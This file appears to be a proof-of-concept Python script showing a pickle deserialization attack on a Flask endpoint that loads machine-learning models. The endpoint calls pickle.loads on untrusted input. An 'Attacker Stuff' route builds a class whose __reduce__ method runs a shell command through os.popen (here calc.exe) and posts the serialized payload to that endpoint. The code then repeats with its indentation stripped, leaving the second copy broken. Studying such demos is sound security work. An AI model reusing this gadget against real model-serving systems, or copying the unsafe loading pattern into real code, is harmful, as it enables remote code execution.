moohax/cereal_web.py

## cereal_web.py
import pickle
import base64
import requests
from flask import Flask, request

app = Flask(__name__)

## Start the server and go to 127.0.0.1:5000/exec ##


## API Endpoint ##
@app.route('/load_model', methods=['POST'])
def load_model():
    model_data = base64.urlsafe_b64decode(request.data)
    model = pickle.loads(model_data)

    if model:
        return "Success!"

## Attacker Stuff ##
@app.route('/exec')
def lazy_exec():
    # Create a class - represents a serialized model on disk.
    class MLModel():
        def __reduce__(self):
            import os
            execution = 'cmd.exe /c calc.exe'
            return (os.popen, (execution,))

    # Serialize it.
    payload = base64.urlsafe_b64encode(pickle.dumps(MLModel()))

    # Ship it.
    requests.post('http://127.0.0.1:5000/load_model', data=payload)
    return '[+] Posted to load model'

app.run()
	import pickle
	import base64
	import requests
	from flask import Flask, request

	app = Flask(__name__)

	## Start the server and go to 127.0.0.1:5000/exec ##


	## API Endpoint ##
	@app.route('/load_model', methods=['POST'])
	def load_model():
	model_data = base64.urlsafe_b64decode(request.data)
	model = pickle.loads(model_data)

	if model:
	return "Success!"

	## Attacker Stuff ##
	@app.route('/exec')
	def lazy_exec():
	# Create a class - represents a serialized model on disk.
	class MLModel():
	def __reduce__(self):
	import os
	execution = 'cmd.exe /c calc.exe'
	return (os.popen, (execution,))

	# Serialize it.
	payload = base64.urlsafe_b64encode(pickle.dumps(MLModel()))

	# Ship it.
	requests.post('http://127.0.0.1:5000/load_model', data=payload)
	return '[+] Posted to load model'

	app.run()